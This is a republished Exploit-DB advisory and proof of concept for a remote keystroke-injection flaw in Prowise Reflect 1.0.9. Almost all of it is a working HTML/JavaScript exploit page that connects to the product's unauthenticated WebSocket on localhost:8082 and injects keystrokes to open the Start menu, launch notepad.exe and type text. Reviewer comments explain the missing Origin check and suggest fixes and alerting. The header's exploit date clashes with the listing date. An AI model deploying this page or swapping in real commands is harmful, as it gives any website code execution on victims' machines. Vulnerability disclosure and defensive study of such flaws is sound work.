Prowise Reflect v1.0.9 – Remote Keystroke Injection

  • 作者: Rik Lutz
    日期: 2022-03-02
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50796/
  • # Exploit Title: Prowise Reflect v1.0.9 - Remote Keystroke Injection
    # Date: 30/10/2022
    # Exploit Author: Rik Lutz
    # Vendor Homepage: https://www.prowise.com/
    # Version: V1.0.9
    # Tested on: Windows 10
    
    # Prowise Reflect software version 1.0.9 for Windows is vulnerable to a remote keystroke injection. 
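    # The effect resembles a Rubber Ducky (USB keystroke-injection) attack, but it is delivered either over the network (when port 8082 is exposed)
    # or by having the user visit a malicious website. This PoC contains such a webpage.
    # Root cause as shown by this PoC: the WebSocket listener on port 8082 accepts "keyboard" events from any client that can connect, including a script on an unrelated web page.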
    # Steps:
    # 1. Start Prowise Reflect
    # 2. Try to connect to a Reflect server, e.g. ygm7u6od
    # 3. While it is connecting, click "Exploit!"
    # - The Start menu opens, "notepad.exe" is typed and launched, and "Hello world!" is typed.
    
    <!DOCTYPE HTML>
    
    <html>
     <head>
    
    <script type = "text/javascript">
    
    /**
     * Busy-wait for roughly `ms` milliseconds.
     *
     * Spins on the wall clock instead of scheduling a timer, so the calling
     * thread is blocked and nothing else on it runs until the deadline passes.
     *
     * @param {number} ms - Delay in milliseconds.
     * @returns {undefined}
     */
    function wait(ms) {
    	const startedAt = Date.now();
    	const deadline = startedAt + ms;
    	// Re-read the clock until the deadline; the loop body is intentionally empty.
    	for (let now = startedAt; now < deadline; now = Date.now()) {}
    }
    
    /**
     * Proof-of-concept handler behind the page's "Exploit!" link.
     *
     * Opens a WebSocket to ws://localhost:8082 and, once the socket is open,
     * sends a fixed sequence of JSON {"event":"keyboard", ...} messages. Per the
     * advisory header, that port belongs to Prowise Reflect 1.0.9 and the
     * messages are replayed as keystrokes on the machine running it.
     *
     * Why this works from a web page: WebSocket handshakes are not blocked by
     * the browser's same-origin policy. The browser only attaches an Origin
     * header; rejecting foreign origins is the server's job.
     * NOTE(review): the service's handshake handling is not shown here - the
     * PoC implies it neither checks Origin nor authenticates the client; confirm
     * against the product.
     *
     * Defensive reading: the fix belongs in the service (Origin allowlist on the
     * handshake, a per-session secret before input events are accepted, no
     * listener on non-loopback interfaces). Until patched, connections to
     * 8082/tcp from browser processes or from other hosts are worth alerting on.
     *
     * Takes no parameters and returns nothing; all effects happen in the
     * socket callbacks.
     */
    function WebSocketTest() {
    	// NOTE(review): never read in this function. A Boolean wrapper object is
    	// also truthy even when it wraps false, so it would not work as a flag.
    	var StateConnecting = new Boolean(false);
    	if ("WebSocket" in window) { 
    		// Let us open a web socket
    		// The target is a listener on the visitor's own machine, reached
    		// from whatever origin served this page.
    		var ws = new WebSocket("ws://localhost:8082");
    
    		ws.onopen = function() {
    
    			// No login, token or pairing message precedes this first event.
    			// "super" key: per the advisory header, this opens the Start menu.
    			ws.send('{"event":"keyboard", "key":"super"}');		
    			// Blocking pause (wait() spins on the clock) before typing.
    			wait(400);
    			//character is slower
    			// ws.send('{"event":"keyboard", "character":"notepad.exe"}'};
    			
    			// You can check for connecting state by sending {"event":"setupRTCConnection", "remoteName":"a"} if the response is {"event":"streamAvailable"} getIsConnecting == true
    			var exploitcode = "notepad.exe"
    			// One "keyboard" message per character; the JSON is built by
    			// string concatenation, so a quote or backslash in the text
    			// would produce malformed JSON.
    			for (let i = 0; i < exploitcode.length; i++) {
    				ws.send('{"event":"keyboard", "key":"' + exploitcode[i] + '"}');
    			} 
    			
    			wait(300);
    			// "enter" submits what was typed into the Start menu.
    			ws.send('{"event":"keyboard", "key":"enter"}');
    			// Longer pause before typing the second string.
    			wait(2000);
    			exploitcode = "Hello world!"
    			
    			// Harmless marker text, sent the same way as above.
    			for (let i = 0; i < exploitcode.length; i++) {
    				ws.send('{"event":"keyboard", "key":"' + exploitcode[i] + '"}');
    			} 
    			wait(200);
    		};
    
    		// Server replies are copied into a local and otherwise ignored.
    		ws.onmessage = function (evt) { 
    			var received_msg = evt.data;
    		};
    
    		ws.onclose = function() { 
    
    			// websocket is closed.
    			alert("Connection is closed..."); 
    		};
    	} else {
    		// The browser doesn't support WebSocket
    		alert("WebSocket NOT supported by your Browser!");
    	}
    }
    </script>
    		
     </head>
     
     <body>
    <div id = "sse">
     <a href = "javascript:WebSocketTest()">Exploit!</a>
    </div>
    
     </body>
    </html>